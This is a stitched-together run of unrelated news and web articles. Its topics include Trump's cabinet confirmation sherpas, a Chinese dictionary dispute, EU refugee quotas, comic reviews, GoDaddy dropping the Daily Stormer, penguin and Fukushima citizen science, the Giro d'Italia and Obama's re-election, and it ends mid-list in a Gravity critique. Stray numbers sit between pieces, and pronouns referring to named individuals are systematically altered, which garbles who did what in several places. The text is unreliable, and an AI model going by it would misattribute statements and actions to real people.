The sherpas are in charge of bringing them up to speed: They'll put together lists of questions they expect the nominees to get. Senators are notorious for using the hearings to press nominees on issues that are important in their home state — from the greater sage-grouse to the Army's 4-25 Infantry Brigade Combat Team at Joint Base Elmendorf–Richardson in Alaska — but that might seem obscure to Washington novices.
They'll also put the nominees through mock confirmation hearings, called murder boards, to help them avoid embarrassing gaffes.
Mnuchin, in particular, is expected to undergo multiple murder boards since Democrats are already targeting them because of their tenure at Goldman Sachs and their ownership of a mortgage company that foreclosed on thousands of homeowners during the recession.
Transition officials are also schooling Mnuchin in the finer points of Washington politesse, urging them to downplay their master-of-the-universe sensibility and act humbly and respectfully to senators, even if they ask tough questions.
The ramped-up transition team effort resembles a who's who of Republican players in Washington: Newly appointed White House press secretary Sean Spicer is at the top of the communications pyramid, followed by other members of the New York-based media team, including Bryan Lanza, the former communications director for the conservative nonprofit Citizens United, and Republican National Committee spokesperson Lindsay Walters.
The transition has also put together a D.C.-based communications team, which includes Danielle Hagen of the PR firm Nahigian Strategies.
The confirmation process is being overseen by Christine Ciccone, a lawyer who helped President George W. Bush get their Cabinet confirmed, and Eric Ueland, a veteran Republican Capitol Hill aide and top staffer on the Senate Budget Committee under Sen. Jeff Sessions.
Meanwhile, each nominee has been assigned a “media sherpa,” who has been tasked with managing negative stories about nominees, helping to sort out the logistics of meetings with senators and their staffs, and providing background information to reporters.
The media sherpas are working alongside the policy sherpas, who know the agencies the nominees are slated to lead and have deep connections with the Senate committees overseeing the confirmation.
Top transition officials are also meeting with Senate leadership to map out the confirmation process.
In some cases, in addition to the transition teams, outside advisers have stepped in to publicly defend the nominees. Friends and supporters of Betsy DeVos, Trump's pick for education secretary, for instance, have set up an informal coalition to push back on negative stories. The group's spokesperson Ed Patru, a vice president at DCI Group, sends regular emails to reporters touting DeVos' record.
The goal of Trump's transition team is to confirm several Cabinet members before Jan. 20, when they assume office. But the timetable for securing confirmations is still fluid.
One D.C. lawyer who has spoken to government officials said the transition team has only just begun filing crucial financial disclosures, known as form 278E, to the U.S. Office of Government Ethics. The lawyer said the team is also lagging behind on nominees' FBI background checks.
It can take weeks to process those forms, raising questions about how many nominees will be approved by the federal government by Jan. 20.
“There's no way that they're going to have more than a handful of people who are vetted by Inauguration Day,” the lawyer said, adding, “They're not even going to get to a murder board unless they have the last share of IBM stock listed on [form] 278E.”
A transition spokesperson did not respond to a request for comment on this story.
A dictionary designed for pupils and middle school students is considered unsuitable by many parents for their kids.
The Xinhua Dictionary with English Translation, published by Nanfang Press in 2003, defines the Chinese word "chicken" as either a kind of poultry, or the derogatory short form for prostitutes. The dictionary also gives "pimp" as one of the meanings of the Chinese word "duck."
The dictionary describes itself as a "modern, up-to-date dictionary specially designed for pupils and middle school students in the new century."
An anonymous parent, however, said they think some of the definitions are unsuitable for young kids and teenagers.
According to an on-line survey on the People's Daily website, 560 out of 878 people who took part in the survey think the dictionary will have a bad influence on kids and teenagers, and 322 of them believe the editors should be punished. 318 respondents think the definition given by the dictionary will not harm young readers.
An editor surnamed Zhang with Nanfang Press said in an interview with Beijing Youth Daily on Thursday, "There is only one edition of the dictionary, published in 2003, so any bad influence on pupils is limited."
They said that if Nanfang Press publishes other dictionaries, definitions of this kind will be deleted.
The country's most authoritative dictionary, Xinhua Dictionary published by Commercial Press in 2005, and other commonly used dictionaries for pupils and middle school students define "chicken" only as poultry.
There is no connection between Commercial Press' Xinhua Dictionary and the Xinhua Dictionary with English Translation by Nanfang Press.
The Xinhua Dictionary with English Translation is now unavailable in most Beijing bookstores and on eBay and TaoBao, China's biggest on-line auction sites. But according to Shenzhen Evening News, hundreds of copies of the dictionary can still be bought in the city's Shenzhen Bookmall.
(Xinhua News Agency August 18, 2006)
EU leaders have tonight stitched up a deal to force countries to take in refugees against their will.
Eastern European countries were told they would have to welcome thousands of asylum seekers under the mandatory quota system to relocate 160,000 people from Greece and Italy after they were out-voted at a Brussels summit.
Diplomats warned the decision to over-rule the autonomy of countries on such a sensitive issue was a ‘big moment' in the history of the union and could lead to ‘blood on the walls'.
Eastern European countries were told they would have to welcome thousands of asylum seekers under the mandatory quota system to relocate 160,000 people from Greece and Italy after they were out-voted at a Brussels summit. Pictured: Hundreds of desperate refugees cross the Hungarian border into Austria today
Slovakia immediately announced it would defy the decision following the deal, with Prime Minister Robert Fico saying that 'as long as I am prime minister, mandatory quotas will not be implemented on Slovak territory'
The Czech Republic, Slovakia, Romania and Hungary tried to block the plan but their vehement opposition was over-ridden after it was decided to use a majority vote at the meeting of interior ministers rather than consensus.
Britain is able to refuse to take part in the quota system to distribute refugees already in Europe as it has an opt-out, along with Denmark.
Slovakia immediately announced it would defy the decision. Prime Minister Robert Fico said: ‘As long as I am prime minister, mandatory quotas will not be implemented on Slovak territory.'
A diplomat from one of the countries opposed to the plan described the atmosphere around the council table as ‘terrible', adding: ‘This is a bad day for Europe.'
Countries in favour of the quotas showed little grace after forcing them through.
French Interior Minister Bernard Cazeneuve said the plan had been approved by a ‘crushing majority'.
‘This decision is testament to the capacity of Europe to take responsibility and progress,' they said.
The controversial decision came as Theresa May demanded the EU ‘get on with the job' of securing its borders as figures showed only a third of those arriving in Italy and Greece are being properly registered and fingerprinted.
The European Commission admitted the chaos that is allowing tens of thousands to stream into Europe unchecked was ‘not optimal'.
At tonight's summit, ministers used a majority vote to force the crucial decision on the European Commission plan to relocate a further 120,000 asylum seekers from Italy and Greece.
French Interior Minister Bernard Cazeneuve (above) said the plan had been approved by a ‘crushing majority'
Countries had already agreed a plan to distribute 40,000 voluntarily at a meeting last week but the new mandatory quotas being pushed by countries including Germany were highly contentious.
Hours before the meeting German Chancellor Angela Merkel pledged to do everything to resolve the redistribution of refugees by consensus, rather than simply outvoting Eastern European countries that strongly oppose the plan.
They said: ‘It's worth every effort to do everything to be able to decide by consensus among the 28 member states, rather than by qualified majority, on important questions such as the distribution of refugees.'
But at the summit the decision was taken by a majority vote, with four Eastern European countries opposing and Finland abstaining.
As long as I am prime minister, mandatory quotas will not be implemented on Slovak territory Slovakia Prime Minister Robert Fico
Britain did not have a vote because it has already opted out of taking part.
Prague warned that the scheme would be unworkable and could end in ‘big ridicule' for governments and EU authorities.
‘We will soon realise that the emperor has no clothes. Common sense lost today,' Czech Interior Minister Milan Chovanec tweeted after the vote.
Ukip MEP Jane Collins said: ‘There is now no escaping the fact that immigration will be decided by Brussels.
‘What we have witnessed today is four countries who wish to control who settles in their country being outvoted by foreign government.'
As they arrived at the summit, Home Secretary Theresa May said the EU needed to take urgent measures to tackle the crisis.
They said: ‘We need to get on with the job of the wider measures that need to be taken, of ensuring we are breaking the link for economic migrants between making this dangerous journey and settling in Europe so we need to return those people who are illegal economic migrants and have no right to be here.
‘And we need to make sure that people arriving at Europe's borders are being properly dealt with and properly fingerprinted so that decisions can be made and where they're illegal economic migrants they can be returned.'
Hours before the meeting German Chancellor Angela Merkel (left) pledged to do everything to resolve the redistribution of refugees by consensus, rather than simply outvoting Eastern European countries that oppose the plan. It came as Theresa May (right) said the EU needed to take urgent measures to tackle the crisis
According to EU figures, in the first seven months of this year 252,000 people illegally crossed the borders into Greece and Italy, but only 85,000 were properly registered and fingerprinted as they should be under EU rules.
The leaders of all 28 member states – including David Cameron – will today head to Brussels to discuss how the EU if failing to cope with the migration crisis.
In a letter to the leaders ahead of the summit, European Council president Donald Tusk said they needed to look at the ‘brutal reality' of the situation.
‘We as Europeans are currently not able to manage our common external borders, hence some States decided to protect themselves by closing their national ones,' they wrote.
‘The protection of the European community is our first duty and obligation and we have failed on this front.'
The EU's border-free travel area, the Schengen Zone, has unravelled in the past fortnight as Germany, Austria, Slovenia have brought back checks.
It is highly embarrassing for the European Union who just a few months ago celebrated the 30th anniversary of the signing of the agreement.
At tonight's summit, ministers used a majority vote to force the crucial decision on the European Commission plan to relocate a further 120,000 asylum seekers from Italy and Greece. Pictured above: Syrian refugees help an elderly woman disembark an overcrowded dinghy upon arriving on the Greek island of Lesbos today
Syrian refugees arrive at a beach on the Greek island of Lesbos in overcrowded dinghies after crossing a part of the Aegean Sea from the Turkish coast
Commissioner for Migration Dimitris Avramopoulos said: ‘On a continent where nations once shed blood to defend their territories, today borders only exist on maps.
‘Removing borders, ensuring safety and building trust took many years after two devastating world wars.
‘The creation of the Schengen area is one of the greatest achievements of the EU and it is irreversible.'
Tory MEP Timothy Kirkhope said: ‘My greatest fear is that forcing such a divisive issue to a vote will have negative consequences in the long run. All 28 EU countries need to work together to manage this crisis and alienating major European states makes finding common solutions even harder.
‘This is not a long term solution to this crisis; It is a sticking plaster, and the way it has been handled diminishes much of the good will that will be needed to find genuine long term and more permanent solutions.
Can Scott Snyder retell the origin of Batman all the while respecting the past? Has Black Beetle put together the pieces of Labyrinto's dangerous puzzle? What is the fate of The Glacier Stone?
We just barely answer any of these questions in this week's Triple Shot! Light week!
BATMAN #21
WRITER: Scott Snyder
PENCILS: Greg Capullo
INKS: Danny Miki
Publication Date: June 13, 2013
Price: $3.99
Publisher: DC Comics
UPC: 6194130640702111
Buy it HERE
Sure, it is Superman week with Man of Steel opening in theaters, and also this Snyder (Scott) writing the new Superman title, Superman: Unchained.
There's no reason for us not to go back to Wayne Manor for the origin of The Batman in Batman #21. This embossed cover comic is the first in the ‘Zero Year' storyline—one meant to replace Batman: Year One in The New 52 parlance.
Fans of the Batman Begins will recognize a beat or two, from Bruce Wayne being away from Alfred for a period of time, but this story is all new, all different.
We're introduced to Bruce's Uncle Philip (Martha's Brother) who is running Wayne Enterprises. Also, we get an origin of the giant penny, shining in copper glory in front of Wayne Tower. We get introduced to the Batcave, Riddler, and The Red Hood Gang as well.
Intriguing story here so far but something is missing. I love seeing tales of Bruce Wayne training to become Batman, and let there be a million of them, please! Denny O'Neil and Edward Hannigan's Shaman delivers an awesome origin of the Batcave from Legends of the Dark Knight, set just before Miller's Year One.
We'll see how this susses out, Snyder sneaks in tropes of the Batman lore in interesting ways, but they only has one shot at telling the origin of Batman in The New 52. Trying to top the 26 year old Year One could be daunting, Batman fans have held on to that story very tightly. Snyder's modernizations and imaginings of the Lucius Fox tech are already super cool here in issue #21.
THE BLACK BEETLE: NO WAY OUT #4 (of 4)
WRITER / ARTIST: Francesco Francavilla
Publication Date: June 13, 2013
Price: $3.99
Publisher: Dark Horse Comics
UPC:
76156822686700411
Buy it HERE
The first miniseries of Francesco Francavilla's The Black Beetle, which sold out of initial copies, concludes this week. The slick pulp detective superhero book will be collected in hardcover in the fall for a beautiful collected edition.
Francavilla's Eisner Award winning art coupled with their love for the noir pulp drama gives us a book based on a character that's both familiar and unique. You might assume this is a reboot or an old hero, but The Black Beetle who serves Colt City is an entirely original creation.
In this fourth issue, we discover the secret of their nemesis Labyrinto and the mysterious mob murders. A deep seeded revenge tale leads the cool looking Labyrinto to unspeakable deeds against friends and family, but The Black Beetle is hot on their trail, and has been for a while.
The Black Beetle will return, also in the fall for the start of a new arc, Necrologue. Francavilla is on to a hit with this Dark Horse series, we will be returning for more.
ARTIFACTS #28
WRITER: Ron Marz
ART: Marco Turini
COLOR: Bill Farmer
Publication Date: June 13, 2013
Price: $3.99
Publisher: Image Comics
UPC: 70985300779102811
Buy it HERE
The 13 Artifacts of the Witchblade / The Darkness universe are being sought in the latest Ron Marz comic.
Defrocked priest and wielder of the Rapture Tom Judge along with The Magdalena and thief Michael Finnegan descend upon a mansion Norway, each hoping to get their hands on The Glacier Stone. A terrifying demon has been summoned to protect the stone and the three team up to scare the powerful demon into the woods after a drawn out fight scene in the mansion.
The speechless demon baits Magdalena onto some ice, where they end up single-handedly slaying the demon with their Spear of Destiny. The Glacier Stone is lost to the depths of the ice to be found, presumably after the the spring season hits.
As a comic book fan, I couldn't have been less prepared for picking up a Witchblade title randomly from the shelf! My unfamiliarity with the book, and clean slate with the characters gave me a good perspective. Ron Marz can write an action packed comic and Turini is great at drawing the two major fight scenes as well. I enjoyed the supernatural elements that reminded me of Hellblazer, and thought the character design of the demon was quite spooky.
This was a solid comic that I didn't feel I needed a tutorial on Witchblade mythos to enjoy. Next month's arc starts off the brand new ‘Geometry of Hell' storyline.
CLOSE Both GoDaddy & Google have announced they will not host the Neo-Nazi site 'The Daily Stormer.' The decision comes after the site used sexist and obscene language to describe 32-year-old Heather Heyer. USA TODAY
The GoDaddy banner hangs outside of the New York Stock Exchange as the website hosting service makes its initial public offering April 1, 2015, in New York City. On Sunday, Aug. 13, 2017, the company announced it would no longer provide service to the neo-Nazi website, "The Daily Stormer." (Photo11: Spencer Platt, Getty Images)
SAN FRANCISCO — Neo-Nazi website The Daily Stormer attempted to switch its domain registration to Google after GoDaddy booted the site over an article on deadly protests at a white supremacist rally in Charlottesville, Va.
The switch, first reported by Reuters, was visible via a public records search on Whois, which displays domain registration information. But hours later, Google's press office said in a statement to USA TODAY that the website violates its terms of service and has since been removed.
Yet The Daily Stormer remained online Monday despite the controversy. GoDaddy, which is the largest Internet domain-name seller in the world, announced Sunday evening it will no longer provide service to The Daily Stormer.
The company (GDDY), which is based in Scottsdale, Ariz., has drawn criticism for months for its willingness to provide a domain name for a website "dedicated to spreading anti-Semitism, neo-Nazism, and white nationalism," according to the Southern Poverty Law Center.
► Sunday: Vigil for Charlottesville victim canceled, but mourners meet at crash site
► Friday: Federal judge allows 'alt-right' rally to go ahead as planned
The move comes after The Daily Stormer published an article Sunday using sexist and obscene language to demean Heather Heyer, the 32-year-old woman who was killed when a car driven by an alleged white supremacist drove into a crowd of counter-protesters after the Charlottesville, Va., rally.
After someone tweeted a reference to the article asking GoDaddy to remove it and ban the site, GoDaddy replied, "We informed The Daily Stormer that they have 24 hours to move the domain to another provider, as they have violated our terms of service."
We informed The Daily Stormer that they have 24 hours to move the domain to another provider, as they have violated our terms of service. — GoDaddy (@GoDaddy) August 14, 2017
GoDaddy corporate spokesperson Dan Race confirmed the action in an email to The Arizona Republic, which like USA TODAY is a part of the USA TODAY Network.
The site was formed in 2013 and contains a variety of content under headlines such as "Race War" and "Jewish Problem." The homepage depicts a white video game character punching a black character.
"GoDaddy does not condone content that advocates expressions of hate, racism, bigotry," said Ben Butler, director of GoDaddy's digital crimes unit. "However, we generally do not take action on complaints that would constitute censorship of content and that represents the exercise of freedom of speech and expression on the Internet.
► April: Lawsuit targets neo-Nazi 'troll storm' against Jewish family
► March: Racist 'assassin' indicted as terrorist in NYC murder of black man
"While we detest the sentiment of such sites, we support a free and open Internet and, similar to the principles of free speech, that sometimes means allowing such tasteless, ignorant content," they said.
They said the recent content on The Daily Stormer crossed the line by encouraging violence.
Domain-name registry services allow people to access the site's content by linking the www.dailystormer.com address to the actual computer hosting the content. GoDaddy did not host the company's information on its services.
► November: Twitter accused of political bias in right-wing crackdown
► November: White supremacists urge trolling Clinton supporters to suicide
A domain-registry search tool on Monday showed the services were transferred to Google, which also said the site violated its terms of service and removed it. It was not clear Monday afternoon what company was hosting the site.
Previously, the company served "as the domain name registrar for The Daily Stormer, through its subsidiary Domains by Proxy, as it has throughout the site's four-year history," according to the investigative news website, Reveal.
Daily Stormer's producer Andrew Anglin posted a message Monday that ignored the rebuke from GoDaddy and instead blamed a brief disruption on the site as the work of the international computer-hacking group Anonymous.
► June 2015: Charleston suspect steeped in supremacist sites, analyst says
Anonymous, which has no formal leadership structure but does have Twitter accounts associated with it, tweeted Monday that it was unaware of any of its followers hacking the site. The tweet suggested Anglin was faking the hack of their site.
"This is likely to be the derps from dailystormer engaging in a silly troll to woo their clueless base," the Anonymous tweet said. "If we're proven wrong, so be it."
Contributing: Ryan Randazzo, The Arizona Republic. Follow Kaila White and Rachel Sandler on Twitter: @kailawhite and @rachsandl
CLOSE Web hosting company GoDaddy pulls the plug on neo-Nazi website Daily Stormer. Veuer's Maria Mercedes Galuppo (@mariamgaluppo) has more. Buzz60
Read or Share this story: https://usat.ly/2wWIhyb
Guys, this is not a drill. Antarctic scientists need you to study photos of penguins to help them figure out how climate change is affecting these stumpy little flightless birds.
Scientists from the UK have installed a series of 75 cameras near penguin territories in Antarctica and its surrounding islands to figure out what's happening with local populations. But with each of those cameras taking hourly photos, they simply can't get through all the adorable images without your help.
"We can't do this work on our own," lead researcher Tom Hart from the University of Oxford told the BBC, "and every penguin that people click on and count on the website - that's all information that tells us what's happening at each nest, and what's happening over time."
The citizen science project is pretty simple - known as PenguinWatch 2.0, all you need to do is log on, look at photos, and identify adult penguins, chicks, and eggs in each image. Each photo requires just a few clicks to identify, and you can chat about your results in the website's 'Discuss' page with other volunteers.
This is us RN: Dearavery/Reddit
A penguin census has been going on in Antarctica since 1994, and thanks to this monitoring, scientists already know that climate change has caused a decline in Adelie and Chinstrap penguins due to declining habitats and changes in food species.
But there are a growing number of pressures on the animals that researchers simply need more data to understand, and seeing as penguins don't really enjoy being followed around by scientists, camera traps are our best way to get an insight into remote populations. (Robot penguin spies are being used by other research teams, just in case this project wasn't adorable enough).
The team is also analysing climate, pollution, and fisheries research from the area, and will combine this with the results from PenguinWatch 2.0 to look for any patterns in what's affecting populations - for example, earlier this year, 150,000 penguins died after an iceberg blocked their access to the sea for hunting.
This isn't just important for protecting penguins - it will also help scientists figure out more about what's happening to Antarctica as a whole, because penguins can be thought of as a sort of 'canary' for the continent.
"As top predators, penguins are considered sentinels of changes within their ecosystem," the PenguinWatch website explains. "Because penguins spend the majority of their life in water and fall at the top of the food chain, any variations in their populations may represent larger changes to the dynamic Antarctic ecosystem."
During the project, you'll be looking at images of Adélie, Chinstrap, Gentoo, King, and Rockhopper penguins.You can see a map of the camera locations below:
So what are you waiting for? Get looking at those cute little penguin faces and waddling legs right now, because science needs you.
NSW Deputy Premier John Barilaro says Prime Minister Malcolm Turnbull should quit before Christmas as a gift to the country.
The Nationals leader said they had "lost all hope" in the Prime Minister after the LNP's apparent loss in the Queensland election. While Queensland LNP leader Tim Nicholls is refusing to concede defeat, so far the party has only 36 seats of the required 47 to win a majority.
"What really got my goat on Sunday was to hear the Prime Minister of this nation turn around and say there were no federal issues that affected the state government and the state election," Mr Barilaro told outspoken 2GB broadcaster Alan Jones.
"I mean that's just a joke. If you're completely out of touch like that comment … in my mind it just shows there is no leadership."
This post first appeared in Yes! magazine.
Workers dressed in protective suits and masks wait outside a building at J-Village, a soccer training complex that became an operation base for those battling Japan's nuclear disaster at the tsunami-damaged Fukushima Dai-ichi nuclear plant, Nov. 11, 2011. (AP Photo/David Guttenfelder, Pool)
In March 2011, an unknown amount of radiation was released into the atmosphere after a powerful tsunami slammed into the Fukushima Daiichi nuclear reactors on the Pacific coast in Japan. Because people had little access to detailed information about radiation levels, they bought up every Geiger counter they could find in stores and online. Soon the counters were all but sold out worldwide, and in Japan a grey market of shoddy Geiger counters sprouted up, some with faulty or fake parts.
Now, as workers at the plant attempt to move 1,500 highly radioactive spent fuel rods from Unit 4, the most heavily damaged reactor, the risk of radioactive contamination is escalated. The rods, housed in a damaged and leaking concrete pool 100 feet above the plant's floor, are being moved to a second enclosed pool where it's hoped they'll be secure if another earthquake hits Japan's coast.
The situation at Fukushima has received limited coverage in the Western media, but many scientists have grave concerns about the health and safety ramifications of the procedure — which has never been tried before — should something go wrong.
In a phone interview, Harvey Wasserman of Nukefree.org emphasized the gravity of the situation.
“God forbid they drop a rod, or another earthquake occurs,” they said.
A mistake in the procedure could be catastrophic. The tightly packed rods together contain 14,000 times the radiation released by the Hiroshima bomb, according to Reuters.
Fortunately, the world will not be in the dark should this happen. Hundreds of ordinary people are contributing to a crowdsourced effort to collect data on radiation levels for scientists and ordinary citizens to use and interpret. The project was launched by SafeCast, an organization formed in the wake of the 2011 earthquake to supplement the sparse data provided by the Japanese government on radiation travel patterns.
“We were completely appalled that there was no way to get this data,” SafeCast co-founder Sean Bonner said, “and that people couldn't see what was happening to their environment.”
Through online collaboration with scientists and programmers, Bonner and their collaborators engineered an easily reproducible and highly accurate GPS-enabled Geiger counter, which they call the bGeigie. They distributed the first batch of 100 to volunteers who crisscrossed Japan in cars, delivery vehicles, and on foot, collecting data on radiation unmatched in scope and accuracy. To make the information from the bGeigies widely available, SafeCast publishes copyright-free maps of the readings that come in from the devices.
The maps, which can be viewed online or on smart phones and tablets via the free SafeCast app, provide large amounts of real-time radiation data that can be compared to previous readings. The maps can also be adjusted to display data provided by government agencies on radiation levels. (In case you're wondering, SafeCast data currently shows no significant increase in radiation on the Pacific Rim since the Fukushima disaster.)
The project has produced almost 14 million data points so far, making it the preferred reference for Yahoo! Japan and the Fukushima Prefecture government, which both used SafeCast data to create their own maps.
Data from independent groups like SafeCast along with data from the United States Department of Energy aerial monitoring helped correct the poorly planned evacuation zones hastily put together in the weeks after the accident, said SafeCast co-founder Pieter Franken in an interview with Boston Public Radio. The organization has also stepped into the role of unofficial watchdog on the decontamination efforts, and released a detailed report on the Japanese government's efforts to clean up several highly contaminated areas.
The maps bring a level of detail that Bonner says was missing in the past, when radiation readings were published as averages for entire cities. This breadth of data offered by SafeCast, said Michael Bradbury, CEO of Seattle-based science news site RealScience, will make it possible to react more efficiently the next time a nuclear crisis occurs.
“When you have a large number of people collecting samples,” Bradbury said in an email, “a form of crowdsourcing helps to confirm numbers and provide a more accurate picture of what's really happening on the ground.”
Advertisement Sources: Talks of Trump event in West Chester Sunday Previous reports of downtown Cincinnati rally erroneous, sources say Share Shares Copy Link Copy
It appears talks of a Trump event in the Greater Cincinnati area have not been silenced.Multiple sources are telling WLWT that a Trump campaign event could still be in the works for West Chester on Sunday.His campaign has not confirmed an appearance near Cincinnati as of yet.Trump is scheduled for Bloomington, Ill. at 10 a.m. and Boca Raton, Fla. at 6 p.m. Sunday, according to their website.Earlier reports about a signed contract for a noon Trump rally at the Duke Energy Convention Center downtown Sunday were erroneous, according to a source in a position to know.Watch this story"It's kind of sad for all the Trump supporters because they're all excited about it," said Eric Deters, the Trump Campaign contact for Northern Kentucky. "They don't know how to get tickets. This is Friday!"There was an abundance of confusion and mixed messages about whether a contract for use of the Duke Energy Convention Center had been signed or not over the past two days.Clarity was as elusive as sightings of the Trump jet."What I understand what happened here...is that the Trump campaign contacted the Duke Energy Center about holding this rally. It's my understanding the Duke Energy Center leaked the story and that's what started this whole ball rollin'."WLWT was told, as well as many other local news outlets, that the rally was on for Sunday.Voters like Barbara Warren said they're intrigued by the Trump campaign.Although a conflict prevents them from going to Sunday's rally, if there is one, they remained interested in hearing more from him. "Not completely confident in Trump yet," they said. "Liked what I heard last night a little bit more," they added, referring to the debate in Miami.People have been planning. The group Cincinnatians Against Hate was organizing a protest outside the rally."He's not welcome here and that we don't want their type of bigotry here in Cincinnati", said spokesperson Aaron Roco. "So, that's why we're saying, not in our city."They may not need Sunday signs of protest after all.A source said the Secret Service deadline at Duke Energy Convention Center passed at noon.The Trump campaign was looking at alternative sites like the Clermont County Fairgrounds, but there was no official announcement as Friday night approached."We don't have any specific information. We're getting a litany of phone calls," said local GOP Chairman Alex Triantafilou.He said the non-traditional Trump campaign has not kept the party in the loop."My guess is it's going to happen just because of all the chatter, but I know the website doesn't have anything on it and that's generating calls as well."Linda Caudill, the campaign contact for Hamilton County, texted today, "I am sorry, but the campaign has issued nothing yet."So, in the thick of the final days for Ohio, as John Kasich barnstormed the state to try to erect a Tuesday night firewall, the Trump rally plans remained a mystery."Is it bad to have a proposed rally that falls through? Absolutely. That's why I think it'll still happen," said Deters.
From an interesting 2003 review article by Jones, Leiby, and Paik (pdf):
The energy economics literature has noted the asymmetric responses of petroleum product prices to price changes for well over a decade, as observed by Balke, Brown, and Yücel (1998) in a review of previous studies. Product prices rise more quickly in response to crude price increases than they decline in response to crude price reductions. Using weekly data on crude prices and a variety of spot and whole gasoline prices, BBY (1998) find considerable support for asymmetry in the time pattern of downstream price changes to changes in upstream prices, although they find that different specifications of asymmetry yield different results.
Applied to the crude-product relationship, asymmetry has a different meaning than it does in the oil price-GDP relationship. In the crude-product relationship, the asymmetry is in the speed of the response, while in the oil price-GDP relationship, it is in the magnitude of the response. Competition will ensure that the magnitudes of the response of product prices to crude price changes are eventually equal. Otherwise profits in refining and distribution would grow without bound.
JOHANNESBURG, South Africa, Feb. 24 (UPI) -- Johannesburg, South Africa, faces a threat from rising toxic waters in abandoned gold mines under the city that could leak out early next year, officials say.
The country's Water Ministry is urging an immediate program of building pumps and monitoring stations, the BBC reported Thursday.
Toxic acidic water has been building up in mine shafts dug underneath Johannesburg more than a century ago that stretch for many miles beneath the city.
The Department of Water Affairs has published a report by a panel of experts warning that if the water is allowed to continue to rise, it will start covering low-lying areas in the vicinity of the former mine at Gold Reef City, popular with tourists.
Water with high acid levels will affect property and infrastructure, the report says.
It recommends that intervention measures to drain acid mine water be made in the western, central and eastern basins of the city.
The South African government has said it would be feasible to have pumping stations in place by March 2012.
Monte Zoncolan will serve as the summit finish of stage 14 of the 2018 Giro d'Italia and will also feature on the Giro Donne route, La Gazzetta dello Sport has reported. The fearsome climb's first appearance in a major race came at the 1997 Giro Donne, and it has since featured five times at the men's Giro, most recently in 2014. Related Articles Not a betrayal, just business: Visentini, Roche and the 1987 Giro d'Italia
Giro d'Italia 2018: Zoncolan and final Rome TT likely as route details emerge
Merckx: Froome must come to the 2018 Giro d'Italia
2018 Giro d'Italia route revealed
The full route of the 2018 Giro will be presented in Milan on Wednesday, but most of the course has already been leaked in the Italian press. A return to the Zoncolan has been strongly rumoured in recent weeks, and the news was confirmed on Sunday by La Gazzetta, which is part of the same RCS stable as the Giro organisation.
As has been the case since 2007, the Giro will take the most demanding way up the Zoncolan, approaching the climb from Ovaro. Just over 10 kilometres in length with an average gradient of 11.9%, the Zoncolan is a brute of a climb, and compact chainsets will be the order of the day as riders tackle the steepest section of 22%.
The difficulty will be augmented on this occasion by the fact that the Zoncolan is just one of five climbs on the menu for May 19 of next year. According to La Gazzetta, stage 14 will set out from San Vito al Tagliamento, and the 181-kilometre leg will feature the climbs of Monte di Ragogna, Avaglio, the Passo Duron and the Sella Valcalda before the final haul up the Zoncolan.
The short but steep Passo Duron and 12% pitches of the Sella Valcalda, in particular, should provide something of a softening up process ahead of the Zoncolan, but, as ever, the mighty 'Kaiser' will be the highlight of the afternoon.
Gilberto Simoni was the first Giro winner atop the Zoncolan in 2003, a feat they repeated in 2007, the first year that the race went by way of Ovaro. Ivan Basso soloed to victory on the Zoncolan in 2010, while Igor Anton secured victory a year later.
Michael Rogers won on the Giro's last visit in 2014 although there was controversy as their breakaway companion Francesco Manuel Bongiorno was impeded by overly-enthusiastic fan and forced to unclip in order to prevent themselves from falling.
While part of the attraction of the Zoncolan is the natural amphitheatre towards the summit that makes for an atmosphere akin to a football stadium, it remains to be seen if RCS Sport will take an additional precaution in 2018 to allay the risk of exuberant tifosi interfering with the racing.
On the day after the Zoncolan stage, it is expected that the Giro will feature a stage finish at Sappada, 31 years after the famous day when Stephen Roche controversially divested their Carrera teammate Roberto Visentini of the maglia rosa on the 1987 Giro.
Speaking to Tuttobici during the week, Giro director Mauro Vegni jokingly decried how much of the route has already been leaked in the Italian press, but suggested Wednesday's presentation could feature important news regarding the 2018 Giro start list. "We still have to reveal something important regarding the participants," Vegni said. "And there will be surprises…"
RCS Sport is especially keen for Chris Froome (Sky) to return to the Giro for the first time since they were disqualified for holding onto a police motorbike on the Mortirolo in 2010. Froome has made a remarkable metamorphosis in the years since, winning the Tour de France four times and claiming the Vuelta a España in September.
Riding the 2018 Giro would give them the opportunity to emulate Bernard Hinault (1982-83) and Eddy Merckx (1972-73) by holding all three Grand Tour titles at the same time. Although Froome has already stated that winning a fifth Tour de France is their priority in 2018, a recent report in the Times suggested that they were giving serious consideration to riding the Giro.
The route of the 2018 Giro Donne, meanwhile, will be unveiled in Tricesimo on December 16, but La Gazzetta reports that the Zoncolan will be the summit finish on the penultimate stage on July 14 of next year. Fabiana Luperini was the first winner atop the Zoncolan in 1997.
WASHINGTON — President Obama's re-election was at once a deeply personal triumph and a victory for the younger, highly diverse and broadly progressive America that rallied to him. It was a result that ought to settle the bitter argument that ground the nation's government to a near-standstill.
The president spent much of the year fighting the effects of a stubbornly sluggish economic recovery and facing implacable opposition among Republicans in Congress who made defeating them a high priority. They fought back by undermining Mitt Romney's major asset as a private-equity specialist and by enlisting Bill Clinton as their chief explainer.
And they mobilized a mighty army of African-American and Hispanic voters. They were all the more determined to exercise their voting rights after Republicans sought in state after state to make it harder for them to cast ballots. Latino voters turned out overwhelmingly for the president, guaranteeing that immigration reform will be on the next Congress' agenda.
Just as important for governance over the next four years, the president took on an increasingly militant conservatism intent on vastly reducing the responsibilities of government and cutting taxes even more on the wealthiest Americans. In the process, they built an alliance of moderates and progressives who still believe in government's essential role in regulating the marketplace and widening the circle of opportunity.
Many have argued that the president ran a “small” and “negative” campaign, and they were certainly not shy about going after Romney. But this misses the extent to which Obama made specific commitments and repeatedly cast the election as a choice between two different philosophical directions.
They were not vague about what they meant. Obama campaigned explicitly on higher taxes for the wealthy as part of a balanced budget deal. They stoutly defended the federal government's interventions to bring the economy back from the brink — and especially their rescue of the auto companies.
It cannot be forgotten that saving General Motors and Chrysler was the most “interventionist” and “intrusive” economic policy Obama pursued — and it proved to be the most electorally successful of all of their decisions. The auto bailout was key to Obama's crucial victory in Ohio, where six in 10 voters approved the rescue. Union households in the state voted strongly for the president, and they held their own among working-class whites.
703
0
0
0
2
705
Hey, now don't get us wrong, we frickin' loved Gravity. We even had a chance to chat with the movie's science advisor – Kevin Grazier – not too long ago, so we know some of the work that went into it.
But what sort of space magazine would we be if we didn't at least offer our critique of some of the science in the movie? So, without further ado, here's what Alfonso Cuarón got right and wrong in Gravity.
And again there are, like, massive spoilers below. So don't read on if you haven't seen it yet and don't want it ruined, or if you want to plead ignorance to science and stuff.
This list is by no means extensive though, so if you spot anything we missed then post it in the comments.
1. Clooney's character is reckless to the point of being ridiculous
